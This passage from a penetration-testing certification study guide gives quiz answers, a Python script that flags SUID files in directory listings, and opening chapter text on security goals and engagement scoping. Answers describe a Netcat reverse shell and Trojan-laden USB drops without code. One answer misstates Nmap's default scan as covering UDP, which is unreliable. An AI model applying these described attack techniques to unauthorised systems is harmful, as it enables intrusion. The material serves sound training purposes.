10. B. Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach. You will learn more about the three goals of security—confidentiality, integrity, and availability—in Chapter 1.

11. B. By default, Nmap will scan the 1,000 most common ports for both TCP and UDP. Chapter 3 covers Nmap and port scanning, including details of what Nmap does by default and how.

12. D. Threat hunting uses the attacker mindset to search the organization's technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian's activity clearly fits this definition. You'll learn more about threat hunting in Chapter 1.

13. A. Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell. Chapters 6 and 10 provide information about setting up remote access once you have compromised a system.

14. C. This is an example of a double‐tagging attack used against 802.1q interfaces. The first tag will be stripped, allowing the second tag to be read as the VLAN tag for the packet. Double jumps may help video gamers, but the other two answers were made up for this question. Chapter 7 digs into network vulnerabilities and exploits.

15. A. ARP spoofing attacks rely on responding to a system's ARP queries faster than the actual target can, thus allowing the attacker to provide false information. Once accepted, the attacker's system can then conduct an on‐path attack. Chapter 7 explores on‐path attacks, methods, and uses.

16. D. Social engineering attacks that rely on social proof rely on persuading the target that other people have behaved similarly. Likeness may sound similar, but it relies on building trust and then persuading the target that they have things in common with the penetration tester. Chapter 8 covers social engineering and how to exploit human behaviors.

17. C. A USB key drop is a form of physical honeypot that can be used to tempt employees at a target organization into picking up and accessing USB drives that are distributed to places they are likely to be found. Typically one or more files will be placed on the drive that are tempting but conceal penetration testing tools that will install Trojans or remote access tools once accessed. Chapter 8 also covers physical security attacks, including techniques like key drops.

18. C. The s in the file attributes indicates that this is a SETUID or SUID file that allows it to run as its owner. Chapter 10 discusses vulnerabilities in Linux, including how to leverage vulnerable SUID files.

19. D. Regional Internet registries like ARIN are best queried either via their websites or using tools like Whois. Nmap is a useful port scanning utility, traceroute is used for testing the path packets take to a remote system, and regmon is an outdated Windows Registry tool that has been supplanted by Process Monitor. You'll read more about OSINT in Chapter 3.

20. C. All of these commands are useful ways to determine if a system is virtualized, but wmic is a Windows tool. You'll learn about VM escape and detection in Chapter 10.
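The SUID answer above hinges on reading the mode string correctly. As an added example that is not part of the study guide, the following Python script parses ls -l output like the kismet_capture line from the assessment question, decodes the setuid, setgid, and sticky bits (including the uppercase S/T case, where the bit is set without the matching execute bit), and reports the entries a defender auditing a host would want to review. All listing lines other than the kismet_capture one are constructed samples.

```python
"""Flag SUID/SGID/sticky entries in `ls -l` output.

Added example, not from the study guide. The kismet_capture line comes from
the assessment question; the other listing lines are constructed samples.
"""
import re
from typing import Dict, List, Optional

# Fields of a GNU `ls -l` line: mode, link count, owner, group, size,
# a three-token date, then the name. The mode string is 10 characters; an
# optional 11th character ('.' or '+') marks an SELinux context or ACLs.
_LS_RE = re.compile(
    r"^(?P<mode>[-dlbcps][rwxsStT-]{9})[.+]?\s+"
    r"(?P<links>\d+)\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+(?P<date>\S+\s+\S+\s+\S+)\s+(?P<name>.+)$"
)


def parse_mode(mode: str) -> Dict[str, object]:
    """Decode a 10-character mode string such as '-rwsr-xr--'.

    The owner execute slot shows 's' when execute and setuid are both set
    and 'S' when setuid is set without execute. The group slot behaves the
    same way for setgid; the other slot uses 't'/'T' for the sticky bit.
    """
    if len(mode) != 10:
        raise ValueError(f"expected a 10-char mode string, got {mode!r}")
    owner, group, other = mode[1:4], mode[4:7], mode[7:10]
    return {
        "type": mode[0],
        "setuid": owner[2] in "sS",
        "setgid": group[2] in "sS",
        "sticky": other[2] in "tT",
        # Uppercase means the special bit is present but execute is not;
        # on a regular file a setuid bit without execute has no effect.
        "setuid_without_exec": owner[2] == "S",
        "setgid_without_exec": group[2] == "S",
        "owner_exec": owner[2] in "xs",
        "group_exec": group[2] in "xs",
        "other_exec": other[2] in "xt",
    }


def parse_ls_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one `ls -l` line; returns None for lines that do not match
    (for example the leading 'total N' line)."""
    m = _LS_RE.match(line.strip())
    if not m:
        return None
    info = parse_mode(m.group("mode"))
    info.update(
        mode=m.group("mode"),
        owner=m.group("owner"),
        group=m.group("group"),
        size=int(m.group("size")),
        name=m.group("name"),
    )
    return info


def find_special_files(listing: str) -> List[Dict[str, object]]:
    """Return entries whose mode carries a setuid, setgid or sticky bit.

    Regular files with setuid/setgid are the usual privilege-escalation
    concern; directories with setgid or sticky bits are reported as well,
    with the type character preserved so a reviewer can tell them apart.
    """
    hits = []
    for line in listing.splitlines():
        info = parse_ls_line(line)
        if info and (info["setuid"] or info["setgid"] or info["sticky"]):
            hits.append(info)
    return hits


# Constructed sample listing; the first entry is the one from the question.
SAMPLE_LISTING = """\
total 5
-rwsr-xr-- 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture
-rwxr-xr-x 1 root root 51760 Jan 12 2024 /usr/bin/ls
-rwSr--r-- 1 root root 1024 Jan 12 2024 /tmp/odd_setuid_no_exec
-rwxr-sr-x 1 root tty 35048 Jan 12 2024 /usr/bin/wall
drwxrwxrwt 12 root root 4096 Jan 12 2024 /tmp
"""

if __name__ == "__main__":
    for hit in find_special_files(SAMPLE_LISTING):
        flags = [f for f in ("setuid", "setgid", "sticky") if hit[f]]
        print(f"{hit['mode']} {hit['owner']}:{hit['group']} "
              f"{hit['name']} -> {', '.join(flags)}")
```

On a live host the same parser can be fed the output of find / -perm /6000 -ls or a plain ls -l so that newly appearing setuid binaries stand out against a known baseline.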

Chapter 1: Penetration Testing

Hackers employ a wide variety of tools to gain unauthorized access to systems, networks, and information. Automated tools, including network scanners, software debuggers, password crackers, exploitation frameworks, and malware, do play an important role in the attacker's toolkit. Cybersecurity professionals defending against attacks should have access to the same tools in order to identify weaknesses in their own defenses that an attacker might exploit.

These automated tools are not, however, the most important tools at a hacker's disposal. The most important tool used by attackers is something that cybersecurity professionals can't download or purchase. It's the power and creativity of the human mind. Skilled attackers leverage quite a few automated tools as they seek to defeat cybersecurity defenses, but the true test of their ability is how well they are able to synthesize the information provided by those tools and pinpoint potential weaknesses in an organization's cybersecurity defenses.

What Is Penetration Testing?

Penetration testing seeks to bridge the gap between the rote use of technical tools to test an organization's security and the power of those tools when placed in the hands of a skilled and determined attacker. Penetration tests are authorized, legal attempts to defeat an organization's security controls and gain unintended access. The tests are time‐consuming and require staff who are as skilled and determined as the real‐world attackers who will attempt to compromise the organization. However, they're also the most effective way for an organization to gain a complete picture of its security vulnerability.

Cybersecurity Goals

Cybersecurity professionals use a well‐known model to describe the goals of information security. The CIA triad, shown in Figure 1.1, includes the three main characteristics of information that cybersecurity programs seek to protect:

Confidentiality measures seek to prevent unauthorized access to information or systems.

Integrity measures seek to prevent unauthorized modification of information or systems.

Availability measures seek to ensure that legitimate use of information and systems remains possible.

FIGURE 1.1 The CIA triad

Attackers, and therefore penetration testers, seek to undermine these goals and achieve three corresponding goals of their own. The attackers’ goals are known as the DAD triad, shown in Figure 1.2:

Disclosure attacks seek to gain unauthorized access to information or systems.

Alteration attacks seek to make unauthorized changes to information or systems.

Denial attacks seek to prevent legitimate use of information and systems.

FIGURE 1.2 The DAD triad

Chapter 2: Planning and Scoping Penetration Tests

THE COMPTIA PENTEST+ EXAM OBJECTIVES COVERED IN THIS CHAPTER INCLUDE:

Domain 1: Engagement Management

  1.1 Summarize pre‐engagement activities.
    Scope definition
      Regulations, frameworks, and standards
        Privacy
        Security
    Rules of engagement
      Exclusions
      Test cases
      Escalation process
      Testing window
    Agreement types
      Non‐disclosure agreement (NDA)
      Master service agreement (MSA)
      Statement of work (SoW)
      Terms of service (ToS)
    Target selection
      Classless Inter‐Domain Routing (CIDR) ranges
      Domains
      Internet Protocol (IP) addresses
      Uniform Resource Locator (URL)
    Assessment types
      Web
      Network
      Mobile
      Cloud
      Application programming interface (API)
      Application
      Wireless
    Shared responsibility model
      Hosting provider responsibilities
      Customer responsibilities
      Penetration tester responsibilities
      Third‐party responsibilities
    Legal and ethical considerations
      Authorization letters
      Mandatory reporting requirements
      Risk to the penetration tester

  1.3 Compare and contrast testing frameworks and methodologies.
    Open Source Security Testing Methodology Manual (OSSTMM)
    Council of Registered Ethical Security Testers (CREST)
    Penetration Testing Execution Standard (PTES)
    MITRE ATT&CK
    Open Web Application Security Project (OWASP) Top 10
    OWASP Mobile Application Security Verification Standard (MASVS)
    Purdue model
    Threat modeling frameworks
      Damage potential, Reproducibility, Exploitability, Affected users, Discoverability (DREAD)
      Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege (STRIDE)
      Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE)

The Engagement Management domain of the CompTIA PenTest+ certification exam objectives deals with preparing for, planning, and scoping a penetration test. In this chapter you will explore pre‐engagement activities such as setting up rules of engagement, handling paperwork such as nondisclosure agreements (NDAs), master service agreements (MSAs), and statements of work (SoWs); handling target selection; and understanding the shared responsibility model and legal and ethical considerations. You will also compare and contrast testing frameworks and methodologies such as the Open Worldwide Application Security Project and many others.

Real World Scenario

Navigating Compliance Requirements

Joanna's organization processes credit cards at multiple retail locations spread throughout a multistate area. As the security analyst for her organization, Joanna is responsible for conducting a regular assessment of the card processing environment.

Joanna's organization processes just over 500,000 transactions a year. Because the organization processes transactions, it must adhere to the Payment Card Industry Data Security Standard (PCI DSS) requirements. It also exclusively uses hardware payment terminals that are part of a PCI SSC (Security Standards Council) listed point‐to‐point encryption (P2PE) solution without cardholder data storage. That means that her organization must provide an annual Self‐Assessment Questionnaire (SAQ), have a quarterly network scan run by an approved scanning vendor (ASV), and fill out an Attestation of Compliance form. The attestation includes a requirement that the Report on Compliance be done based on the PCI DSS Requirements and Security Assessment Procedures that currently cover her company.

As a penetration tester, you need to be able to determine what requirements you may have to meet for a compliance‐based assessment. Using the information given here, can you figure out what Joanna's assessment process will require? You can start here:

https://www.pcisecuritystandards.org/document_library

A few questions to get you started:

What type of penetration test would you recommend to Joanna? Would a known environment or an unknown environment assessment be the most appropriate, and why?

How would you describe the scope of the assessment?

What rules of engagement should you specify for the production card processing systems Joanna needs to have tested?

What merchant level does Joanna's organization fall into?

What Self‐Assessment Questionnaire (SAQ) level is Joanna's company most likely covered by, and why?

What questions in the SAQ are likely to be answered NA based on the solution described?

Is Joanna's team required to perform vulnerability scans of card processing systems in her environment?

Summarizing Pre‐engagement Activities

The first step in most penetration testing engagements is determining what should be tested. This step belongs to the pre‐engagement activities, in which you define the scope of the assessment. The scope determines what penetration testers will do and how their time will be spent.

Determining the scope requires working with the person or organization for whom the penetration test will be performed. Testers need to understand all of the following as part of the scope definition:

Why the test is being performed

Whether specific requirements such as compliance or business needs are driving the test

What systems, networks, or services should be tested and when

What information can and cannot be accessed during testing

What the rules of engagement for the test are

What techniques are permitted or forbidden

To whom the final report will be presented

Testers will also need to assess the responsibilities of all parties involved, such as hosting providers, customers, and vendors. Lastly, testers will need to understand legal and ethical considerations required for conducting tests.

The Penetration Testing Execution Standard at www.pentest-standard.org is a great resource for penetration testers. It includes information about pre‐engagement interactions like those covered in this chapter as well as detailed breakdowns of intelligence gathering, threat modeling, vulnerability analysis, exploitation and post‐exploitation activities, and reporting. The team that built it also created a technical guideline that can be useful, although some of the material is slightly dated. It's available here:

http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines

Scope Definition

When defining the scope of the test, you must consider many pre‐engagement activities. The first thing any tester should review is the regulations, frameworks, and standards that will apply when planning for and ultimately conducting the tests.

Any regulatory or compliance requirement, and any framework or standard the client is required to follow, should be reviewed and adhered to as part of the test. This can alter your scope and should be clearly understood at this juncture. For example, when running tests for a health care provider, you must consider HIPAA: patient privacy must be protected as part of your test, and any information you collect may itself contain patient data that you are able to view. Another example is PCI and any other financial compliance measures that must be followed. As part of the scope definition, make sure you are fully aware of and discuss these regulations before firming up the scope and beginning any testing. Doing so may surface privacy and security issues that the customer needs to consider up front, before any testing begins.

When planning for your penetration test (pentest), you should begin by attempting to frame the scope of the test, which creates your boundaries and defines who will be affected, what will be tested, and what may be impacted. The scope of the test is considered the first step of your pentest and allows you, the tester, to identify internal and external technology that may be part of the test. An example would be testing a company's assets internally, but also noting that they are connected to two separate cloud providers that will also be part of the test.

Doing this will also allow you to scope what will and will not be part of the test. Using the previous example, the customer may not want you to test the external cloud providers, which will help firm up the scope of work. Doing this work up front will also help you define what type of assessment you want to conduct. Lastly, the scope definition should clearly define what is in and out of scope.

Scoping agreements and the rules of engagement must define more than just what will be tested. In fact, documenting the limitations of the test can be just as important as documenting what will be included. The testing agreement or scope documentation should contain disclaimers explaining that the test is valid only at the point in time when it is conducted and that the scope and methodology chosen can impact the comprehensiveness of the test. After all, a known environment penetration test is far more likely to find issues buried layers deep in a design than an unknown environment test of well‐secured systems!

Problem handling and resolution is another key element of the rules of engagement. Although penetration testers and clients always hope that the tests will run smoothly and won't cause any disruption, testing systems and services, particularly in production environments using actual attack and exploit tools, can cause outages and other problems. In those cases, having a clearly defined communication, notification, and escalation path on both sides of the engagement can help minimize downtime and other issues for the target organization. Penetration testers should carefully document their responsibilities and limitations of liability and ensure that clients know what could go wrong and that both sides agree on how it should be handled. This ensures that both the known and unknown impacts of the test can be addressed appropriately.

Permission

The tools and techniques we will cover in this book are the bread and butter of a penetration tester's job, but they are very likely illegal to use on another owner's equipment without permission. Before you plan (and especially before you execute) a penetration test, you must have appropriate permission. In most cases, you should be sure to have appropriate documentation for that permission in the form of a signed agreement, a memo from senior management, or a similar “get out of jail free” card from a person or people in the target organization with the rights to give you permission.

Why is it called a “get out of jail free” card? It's the document that you would produce if something went wrong. Permission from the appropriate party can help you stay out of trouble if something goes wrong.

Scoping Considerations—A Deeper Dive

As you've likely already realized, determining the detailed scope of a test can involve a significant amount of work. Even a small organization may have a complex set of systems, applications, and infrastructure, and determining the scope of a penetration test can be challenging unless the organization has detailed and accurate architecture, dataflow, and system documentation. Of course, if the engagement is an unknown environment test, the detail available to penetration testers may be limited, so they will need to know how to avoid going outside of the intended scope of the test.

Detailed scoping starts by determining the acceptable targets. Are they first party hosted (internally) or third party hosted (externally), and are they on‐site or off‐site? Are they hosted by the organization itself, by a third party, or by an infrastructure‐as‐a‐service (IaaS) or other service provider? Are they virtual, physical, or a hybrid, and does this impact the assessment? Are there specific environmental restrictions that need to be applied for the network, applications, or cloud systems and services?